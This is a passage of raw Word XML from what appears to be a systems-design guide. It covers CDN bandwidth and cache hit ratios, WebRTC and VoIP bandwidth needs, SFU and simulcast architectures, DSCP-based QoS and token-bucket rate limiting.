      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Origin server outbound: 1,000,000 × 2 MB = 2 TB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0519BFAC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Origin needs sustained: 2 TB / 60 seconds (if spread over 1 minute) = 267 Gbps → impossible from a single origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DADD2F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>With CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32643AA7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Origin sends 2 MB to CDN ONCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2AE5B2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>CDN edge serves 1 million requests from cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABAAD03" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Origin outbound: 2 MB. CDN outbound: 2 TB (distributed across 300+ PoPs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C33A5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each PoP serves: ~3,333 requests × 2 MB = 6.7 GB → trivial from a single edge server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5F578" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache hit ratio directly determines origin bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C6BCBB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B433E5C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Origin bandwidth = Total requests × Miss rate × Average response size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBBFC88" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>With 95% cache hit ratio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD3AE39" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CF78C2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Origin bandwidth = 1,000,000 × 0.05 × 2 MB = 100 GB (not 2 TB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305858DC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Every 1% improvement in cache hit ratio reduces origin bandwidth by 20% (in this scenario).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4855B41B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.5 Real-Time Communication (WebRTC, VoIP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEB54E4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth requirements for real-time media:</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29"/>
        <w:gridCol w:w="2589"/>
        <w:gridCol w:w="2723"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="3F0B6AB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246394" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>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0CF9CE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Bandwidth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D85A43" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Latency Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="6A8E7A3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09FF65" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Voice (G.711)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978467" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>64 Kbps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BF64E6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>&lt; 150ms one-way</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="7093447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F42FDA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Voice (Opus)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DCB928" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>6–64 Kbps (adaptive)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B7E9DA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>&lt; 150ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="6E12A25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B71F4A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:lastRenderedPageBreak/>
              <w:t>Video (720p)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38366B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>1.5–4 Mbps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8C8D3A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>&lt; 200ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="172CED6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EACD41" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Video (1080p)</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D114F2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>3–8 Mbps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1D7C0E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>&lt; 200ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="23BCECD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9BFA08" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Screen sharing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D3E38A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>0.5–5 Mbps (variable)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CD0EC9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>&lt; 300ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21D6DA4F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group calls — bandwidth explosion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81D93F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>In a peer-to-peer mesh (each participant sends to every other):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727829D7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA02C9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>N participants × (N-1) streams per participant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A799F3A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="06DE557B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>10-person call:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A820842" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each person sends: 9 streams × 1.5 Mbps = 13.5 Mbps upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098384C7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each person receives: 9 streams × 1.5 Mbps = 13.5 Mbps download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15896DA2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total bandwidth per person: 27 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543FA130" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SFU (Selective Forwarding Unit) architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28179744" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C12C39A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each person sends: 1 stream to server = 1.5 Mbps upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6B1C0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each person receives: 9 streams from server = 13.5 Mbps download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3E058A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Server bandwidth: 10 × 1.5 + 10 × 13.5 = 150 Mbps total (for 10-person call)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55676376" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Simulcast (bandwidth optimization for SFU):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5F8805" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each sender produces 3 quality levels: high (1.5 Mbps), medium (500 Kbps), low (150 Kbps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF22612" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Sender upload: 2.15 Mbps total (all three).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAB5CEE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Server sends high quality to active speaker, medium to thumbnail views, low to off-screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0218C884" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Receiver bandwidth adapts to what they're actually watching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD13052" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="12C83812">
          <v:rect id="_x0000_i4378" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73376E63" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Bandwidth Shaping and Quality of Service (QoS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3092D06E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 Why Bandwidth Shaping Matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B52DC10" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Not all traffic is equally important. When bandwidth is constrained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D10BF6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>VoIP traffic needs guaranteed low-latency delivery (100ms for acceptable call quality).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C48E0B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Video streaming can buffer (seconds of acceptable delay).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298A263F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bulk data transfer (backups) can be best-effort (complete overnight is fine).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EA0818" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Health checks MUST get through (or healthy nodes appear dead).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344545F4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Traffic Classification and Prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6099752F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Differentiated Services (DiffServ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A317A37" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each IP packet has a 6-bit DSCP (Differentiated Services Code Point) field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572A90A2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FB6C0C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>DSCP Value → Per-Hop Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466CCFFE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>EF (46)   → Expedited Forwarding (low loss, low latency, guaranteed bandwidth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57740FA0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>AF41 (34) → Assured Forwarding (prioritized, some queuing acceptable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A884A7D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>AF21 (18) → Medium priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E5D52" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>CS0 (0)   → Best effort (default, no guarantees)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F10AB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Routers/switches use DSCP to decide queueing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF4FF3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>EF packets go into a priority queue (served first, always).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B29B1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>AF packets go into weighted fair queues (get proportional share).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4B546D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Best-effort packets fill remaining capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F2AD5E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 Rate Limiting and Throttling (Bandwidth Perspective)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F1CBD6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token Bucket for bandwidth control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E259EAB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444DC5C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bucket capacity: 10 MB (burst allowance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C6B840" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Token rate: 1 MB/s (sustained bandwidth limit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3297286C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="6BF68169" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each byte sent consumes one token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACF929A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>If tokens available: send immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383808B8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>If bucket empty: packet is delayed or dropped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B34E8A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This allows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8D9D9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bursts up to 10 MB (bucket full → send 10 MB instantly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A523E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
